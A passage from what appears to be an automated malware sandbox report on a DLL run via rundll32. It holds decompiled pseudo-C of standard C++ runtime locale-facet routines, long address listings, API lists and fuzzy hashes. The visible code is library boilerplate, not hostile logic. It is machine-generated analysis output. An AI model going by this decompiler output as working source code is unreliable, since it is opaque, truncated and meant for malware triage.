							_t389 =  *(_t418 - 0x10);
							 *(_t418 - 0x10) = _t389;
							 *(_t418 - 4) = 1;
							E6E206FD3(__eflags, _t389);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t389 + 4))))();
							 *0x6e2c6dc4 = _t389;
							goto L5;
						}
					} else {
						_t389 = _t399;
						goto L5;
					}
				}
			}

































                          0x6e20f759
                          0x6e20f759
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78a
                          0x6e20f78f
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F760
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F76A
                          • int.LIBCPMT ref: 6E20F781
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • moneypunct.LIBCPMT ref: 6E20F7A4
                          • std::_Facet_Register.LIBCPMT ref: 6E20F7BB
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F7DB
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F7F9
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                          • String ID: xm,n
                          • API String ID: 113178234-1559963885
                          • Opcode ID: ac68a556dcb167d71a36b1fe2792b94f77d70aa96ddf60b19f2c1d4de0dc03d9
                          • Instruction ID: 8004293cadcf95e0c9dcf2b7f552294a58c66b67e777e9209cd1033daeb19f73
                          • Opcode Fuzzy Hash: ac68a556dcb167d71a36b1fe2792b94f77d70aa96ddf60b19f2c1d4de0dc03d9
                          • Instruction Fuzzy Hash: C211067A90051D9BCF01DBE0C898AEEB7BBAF44715F240908E410AB3D0DB749A44C792
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F229, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20F229(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t251;
				signed int _t252;
				void* _t264;
				void* _t277;
				void* _t290;
				void* _t303;
				void* _t316;
				void* _t329;
				void* _t342;
				void* _t355;
				void* _t368;
				void* _t381;
				void* _t394;
				void* _t407;
				void* _t420;
				void* _t433;
				void* _t446;
				void* _t459;
				signed int _t663;
				signed int _t718;
				signed int _t719;
				signed int _t720;
				signed int _t721;
				signed int _t722;
				signed int _t723;
				signed int _t724;
				signed int _t725;
				signed int _t726;
				signed int _t727;
				signed int _t728;
				signed int _t729;
				signed int _t730;
				signed int _t731;
				signed int _t732;
				signed int _t733;
				signed int _t735;
				signed int _t736;
				signed int _t737;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				signed int _t746;
				signed int _t747;
				signed int _t748;
				signed int _t749;
				signed int _t750;
				signed int _t751;
				signed int _t752;
				void* _t770;

				_t715 = __edx;
				_t544 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t770 - 0x14, 0);
				_t735 =  *0x6e2c6db8; // 0x0
				 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
				 *(_t770 - 0x10) = _t735;
				_t251 = E6E1E161C(0x6e2c6d6c);
				_t547 =  *((intOrPtr*)(_t770 + 8));
				_t252 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t251);
				_t717 = _t252;
				if(_t252 != 0) {
					L5:
					E6E2066BA(_t770 - 0x14);
					return E6E220075(_t717);
				} else {
					if(_t735 == 0) {
						_push( *((intOrPtr*)(_t770 + 8)));
						_push(_t770 - 0x10);
						__eflags = E6E210F1F(__ebx, _t547, __edx, _t717, _t735) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t770 - 0x20);
							E6E223D74(_t770 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t717, _t735, 0x14);
							E6E206653(_t770 - 0x14, 0);
							_t736 =  *0x6e2c6dec; // 0x0
							 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
							 *(_t770 - 0x10) = _t736;
							_t264 = E6E1E161C(0x6e2c6d98);
							_t554 =  *((intOrPtr*)(_t770 + 8));
							_t718 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t264);
							__eflags = _t718;
							if(_t718 != 0) {
								L12:
								E6E2066BA(_t770 - 0x14);
								return E6E220075(_t718);
							} else {
								__eflags = _t736;
								if(_t736 == 0) {
									_push( *((intOrPtr*)(_t770 + 8)));
									_push(_t770 - 0x10);
									__eflags = E6E210F87(_t544, _t554, __edx, _t718, _t736) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t770 - 0x20);
										E6E223D74(_t770 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t544, _t718, _t736, 0x14);
										E6E206653(_t770 - 0x14, 0);
										_t737 =  *0x6e2c6dbc; // 0x0
										 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
										 *(_t770 - 0x10) = _t737;
										_t277 = E6E1E161C(0x6e2c6d70);
										_t561 =  *((intOrPtr*)(_t770 + 8));
										_t719 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t277);
										__eflags = _t719;
										if(_t719 != 0) {
											L19:
											E6E2066BA(_t770 - 0x14);
											return E6E220075(_t719);
										} else {
											__eflags = _t737;
											if(_t737 == 0) {
												_push( *((intOrPtr*)(_t770 + 8)));
												_push(_t770 - 0x10);
												__eflags = E6E210FEF(_t544, _t561, __edx, _t719, _t737) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t770 - 0x20);
													E6E223D74(_t770 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t544, _t719, _t737, 0x14);
													E6E206653(_t770 - 0x14, 0);
													_t738 =  *0x6e2c6df0; // 0x0
													 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
													 *(_t770 - 0x10) = _t738;
													_t290 = E6E1E161C(0x6e2c6d9c);
													_t568 =  *((intOrPtr*)(_t770 + 8));
													_t720 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t290);
													__eflags = _t720;
													if(_t720 != 0) {
														L26:
														E6E2066BA(_t770 - 0x14);
														return E6E220075(_t720);
													} else {
														__eflags = _t738;
														if(_t738 == 0) {
															_push( *((intOrPtr*)(_t770 + 8)));
															_push(_t770 - 0x10);
															__eflags = E6E211057(_t544, _t568, _t715, _t720, _t738) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t770 - 0x20);
																E6E223D74(_t770 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t544, _t720, _t738, 0x14);
																E6E206653(_t770 - 0x14, 0);
																_t739 =  *0x6e2c6dc0; // 0x0
																 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																 *(_t770 - 0x10) = _t739;
																_t303 = E6E1E161C(0x6e2c6d74);
																_t575 =  *((intOrPtr*)(_t770 + 8));
																_t721 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t303);
																__eflags = _t721;
																if(_t721 != 0) {
																	L33:
																	E6E2066BA(_t770 - 0x14);
																	return E6E220075(_t721);
																} else {
																	__eflags = _t739;
																	if(_t739 == 0) {
																		_push( *((intOrPtr*)(_t770 + 8)));
																		_push(_t770 - 0x10);
																		__eflags = E6E2110BF(_t544, _t575, _t715, _t721, _t739) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t770 - 0x20);
																			E6E223D74(_t770 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t544, _t721, _t739, 0x14);
																			E6E206653(_t770 - 0x14, 0);
																			_t740 =  *0x6e2c6df8; // 0x0
																			 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																			 *(_t770 - 0x10) = _t740;
																			_t316 = E6E1E161C(0x6e2c6da4);
																			_t582 =  *((intOrPtr*)(_t770 + 8));
																			_t722 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t316);
																			__eflags = _t722;
																			if(_t722 != 0) {
																				L40:
																				E6E2066BA(_t770 - 0x14);
																				return E6E220075(_t722);
																			} else {
																				__eflags = _t740;
																				if(_t740 == 0) {
																					_push( *((intOrPtr*)(_t770 + 8)));
																					_push(_t770 - 0x10);
																					__eflags = E6E211127(_t544, _t582, _t715, _t722, _t740) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t770 - 0x20);
																						E6E223D74(_t770 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t544, _t722, _t740, 0x14);
																						E6E206653(_t770 - 0x14, 0);
																						_t741 =  *0x6e2c6df4; // 0x0
																						 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																						 *(_t770 - 0x10) = _t741;
																						_t329 = E6E1E161C(0x6e2c6da0);
																						_t589 =  *((intOrPtr*)(_t770 + 8));
																						_t723 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t329);
																						__eflags = _t723;
																						if(_t723 != 0) {
																							L47:
																							E6E2066BA(_t770 - 0x14);
																							return E6E220075(_t723);
																						} else {
																							__eflags = _t741;
																							if(_t741 == 0) {
																								_push( *((intOrPtr*)(_t770 + 8)));
																								_push(_t770 - 0x10);
																								__eflags = E6E2111AB(_t544, _t589, _t715, _t723, _t741) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t770 - 0x20);
																									E6E223D74(_t770 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t544, _t723, _t741, 0x14);
																									E6E206653(_t770 - 0x14, 0);
																									_t742 =  *0x6e2c6dc8; // 0x0
																									 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																									 *(_t770 - 0x10) = _t742;
																									_t342 = E6E1E161C(0x6e2c6d7c);
																									_t596 =  *((intOrPtr*)(_t770 + 8));
																									_t724 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t342);
																									__eflags = _t724;
																									if(_t724 != 0) {
																										L54:
																										E6E2066BA(_t770 - 0x14);
																										return E6E220075(_t724);
																									} else {
																										__eflags = _t742;
																										if(_t742 == 0) {
																											_push( *((intOrPtr*)(_t770 + 8)));
																											_push(_t770 - 0x10);
																											__eflags = E6E211230(_t544, _t596, _t715, _t724, _t742) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t770 - 0x20);
																												E6E223D74(_t770 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t544, _t724, _t742, 0x14);
																												E6E206653(_t770 - 0x14, 0);
																												_t743 =  *0x6e2c6dc4; // 0x0
																												 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																												 *(_t770 - 0x10) = _t743;
																												_t355 = E6E1E161C(0x6e2c6d78);
																												_t603 =  *((intOrPtr*)(_t770 + 8));
																												_t725 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t355);
																												__eflags = _t725;
																												if(_t725 != 0) {
																													L61:
																													E6E2066BA(_t770 - 0x14);
																													return E6E220075(_t725);
																												} else {
																													__eflags = _t743;
																													if(_t743 == 0) {
																														_push( *((intOrPtr*)(_t770 + 8)));
																														_push(_t770 - 0x10);
																														__eflags = E6E2112B4(_t544, _t603, _t715, _t725, _t743) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t770 - 0x20);
																															E6E223D74(_t770 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t544, _t725, _t743, 0x14);
																															E6E206653(_t770 - 0x14, 0);
																															_t744 =  *0x6e2c6dd8; // 0x0
																															 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																															 *(_t770 - 0x10) = _t744;
																															_t368 = E6E1E161C(0x6e2c6d84);
																															_t610 =  *((intOrPtr*)(_t770 + 8));
																															_t726 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t368);
																															__eflags = _t726;
																															if(_t726 != 0) {
																																L68:
																																E6E2066BA(_t770 - 0x14);
																																return E6E220075(_t726);
																															} else {
																																__eflags = _t744;
																																if(_t744 == 0) {
																																	_push( *((intOrPtr*)(_t770 + 8)));
																																	_push(_t770 - 0x10);
																																	__eflags = E6E211339(_t544, _t610, _t715, _t726, _t744) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t770 - 0x20);
																																		E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t544, _t726, _t744, 0x14);
																																		E6E206653(_t770 - 0x14, 0);
																																		_t745 =  *0x6e2c6db0; // 0x0
																																		 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																		 *(_t770 - 0x10) = _t745;
																																		_t381 = E6E1E161C(0x6e2c6d64);
																																		_t617 =  *((intOrPtr*)(_t770 + 8));
																																		_t727 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t381);
																																		__eflags = _t727;
																																		if(_t727 != 0) {
																																			L75:
																																			E6E2066BA(_t770 - 0x14);
																																			return E6E220075(_t727);
																																		} else {
																																			__eflags = _t745;
																																			if(_t745 == 0) {
																																				_push( *((intOrPtr*)(_t770 + 8)));
																																				_push(_t770 - 0x10);
																																				__eflags = E6E2113A1(_t544, _t617, _t715, _t727, _t745) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t770 - 0x20);
																																					E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t544, _t727, _t745, 0x14);
																																					E6E206653(_t770 - 0x14, 0);
																																					_t746 =  *0x6e2c6ddc; // 0x0
																																					 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																					 *(_t770 - 0x10) = _t746;
																																					_t394 = E6E1E161C(0x6e2c6d88);
																																					_t624 =  *((intOrPtr*)(_t770 + 8));
																																					_t728 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t394);
																																					__eflags = _t728;
																																					if(_t728 != 0) {
																																						L82:
																																						E6E2066BA(_t770 - 0x14);
																																						return E6E220075(_t728);
																																					} else {
																																						__eflags = _t746;
																																						if(_t746 == 0) {
																																							_push( *((intOrPtr*)(_t770 + 8)));
																																							_push(_t770 - 0x10);
																																							__eflags = E6E211409(_t544, _t624, _t715, _t728, _t746) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1E1438(_t770 - 0x20);
																																								E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e2683cf, _t544, _t728, _t746, 0x14);
																																								E6E206653(_t770 - 0x14, 0);
																																								_t747 =  *0x6e2c6de0; // 0x0
																																								 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																								 *(_t770 - 0x10) = _t747;
																																								_t407 = E6E1E161C(0x6e2c6d8c);
																																								_t631 =  *((intOrPtr*)(_t770 + 8));
																																								_t729 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t407);
																																								__eflags = _t729;
																																								if(_t729 != 0) {
																																									L89:
																																									E6E2066BA(_t770 - 0x14);
																																									return E6E220075(_t729);
																																								} else {
																																									__eflags = _t747;
																																									if(_t747 == 0) {
																																										_push( *((intOrPtr*)(_t770 + 8)));
																																										_push(_t770 - 0x10);
																																										__eflags = E6E211471(_t544, _t631, _t715, _t729, _t747) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1E1438(_t770 - 0x20);
																																											E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																											asm("int3");
																																											E6E2200AC(0x6e2683cf, _t544, _t729, _t747, 0x14);
																																											E6E206653(_t770 - 0x14, 0);
																																											_t748 =  *0x6e2c6dfc; // 0x0
																																											 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																											 *(_t770 - 0x10) = _t748;
																																											_t420 = E6E1E161C(0x6e2c6da8);
																																											_t638 =  *((intOrPtr*)(_t770 + 8));
																																											_t730 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t420);
																																											__eflags = _t730;
																																											if(_t730 != 0) {
																																												L96:
																																												E6E2066BA(_t770 - 0x14);
																																												return E6E220075(_t730);
																																											} else {
																																												__eflags = _t748;
																																												if(_t748 == 0) {
																																													_push( *((intOrPtr*)(_t770 + 8)));
																																													_push(_t770 - 0x10);
																																													__eflags = E6E2114EC(_t544, _t638, _t715, _t730, _t748) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1E1438(_t770 - 0x20);
																																														E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																														asm("int3");
																																														E6E2200AC(0x6e2683cf, _t544, _t730, _t748, 0x14);
																																														E6E206653(_t770 - 0x14, 0);
																																														_t749 =  *0x6e2c6dcc; // 0x0
																																														 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																														 *(_t770 - 0x10) = _t749;
																																														_t433 = E6E1E161C(0x6e2c6d80);
																																														_t645 =  *((intOrPtr*)(_t770 + 8));
																																														_t731 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t433);
																																														__eflags = _t731;
																																														if(_t731 != 0) {
																																															L103:
																																															E6E2066BA(_t770 - 0x14);
																																															return E6E220075(_t731);
																																														} else {
																																															__eflags = _t749;
																																															if(_t749 == 0) {
																																																_push( *((intOrPtr*)(_t770 + 8)));
																																																_push(_t770 - 0x10);
																																																__eflags = E6E211558(_t544, _t645, _t715, _t731, _t749) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1E1438(_t770 - 0x20);
																																																	E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																																	asm("int3");
																																																	E6E2200AC(0x6e2683cf, _t544, _t731, _t749, 0x14);
																																																	E6E206653(_t770 - 0x14, 0);
																																																	_t750 =  *0x6e2c6e00; // 0x0
																																																	 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																																	 *(_t770 - 0x10) = _t750;
																																																	_t446 = E6E1E161C(0x6e2c6dac);
																																																	_t652 =  *((intOrPtr*)(_t770 + 8));
																																																	_t732 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t446);
																																																	__eflags = _t732;
																																																	if(_t732 != 0) {
																																																		L110:
																																																		E6E2066BA(_t770 - 0x14);
																																																		return E6E220075(_t732);
																																																	} else {
																																																		__eflags = _t750;
																																																		if(_t750 == 0) {
																																																			_push( *((intOrPtr*)(_t770 + 8)));
																																																			_push(_t770 - 0x10);
																																																			__eflags = E6E2115C4(_t544, _t652, _t715, _t732, _t750) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E1E1438(_t770 - 0x20);
																																																				E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																																				asm("int3");
																																																				E6E2200AC(0x6e2683cf, _t544, _t732, _t750, 0x14);
																																																				E6E206653(_t770 - 0x14, 0);
																																																				_t751 =  *0x6e2c6dd0; // 0x0
																																																				 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																																				 *(_t770 - 0x10) = _t751;
																																																				_t459 = E6E1E161C(0x6e2c6d60);
																																																				_t659 =  *((intOrPtr*)(_t770 + 8));
																																																				_t733 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t459);
																																																				__eflags = _t733;
																																																				if(_t733 != 0) {
																																																					L117:
																																																					E6E2066BA(_t770 - 0x14);
																																																					return E6E220075(_t733);
																																																				} else {
																																																					__eflags = _t751;
																																																					if(_t751 == 0) {
																																																						_push( *((intOrPtr*)(_t770 + 8)));
																																																						_push(_t770 - 0x10);
																																																						__eflags = E6E21162A(_t544, _t659, _t715, _t733, _t751) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							_t663 = _t770 - 0x20;
																																																							E6E1E1438(_t663);
																																																							E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																																							asm("int3");
																																																							E6E2200AC(0x6e26851f, _t544, _t733, _t751, 4);
																																																							_t752 = _t663;
																																																							 *(_t770 - 0x10) = _t752;
																																																							 *((intOrPtr*)(_t752 + 4)) =  *((intOrPtr*)(_t770 + 0xc));
																																																							_push( *((intOrPtr*)(_t770 + 0x14)));
																																																							_t245 = _t770 - 4;
																																																							 *_t245 =  *(_t770 - 4) & 0x00000000;
																																																							__eflags =  *_t245;
																																																							 *_t752 = 0x6e26c0c4;
																																																							 *((char*)(_t752 + 0x28)) =  *((intOrPtr*)(_t770 + 0x10));
																																																							E6E21542F(_t544, _t663, _t715, _t733, _t752,  *_t245);
																																																							return E6E220075(_t752,  *((intOrPtr*)(_t770 + 8)));
																																																						} else {
																																																							_t733 =  *(_t770 - 0x10);
																																																							 *(_t770 - 0x10) = _t733;
																																																							 *(_t770 - 4) = 1;
																																																							E6E206FD3(__eflags, _t733);
																																																							 *0x6e26a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t733 + 4))))();
																																																							 *0x6e2c6dd0 = _t733;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t733 = _t751;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t732 =  *(_t770 - 0x10);
																																																				 *(_t770 - 0x10) = _t732;
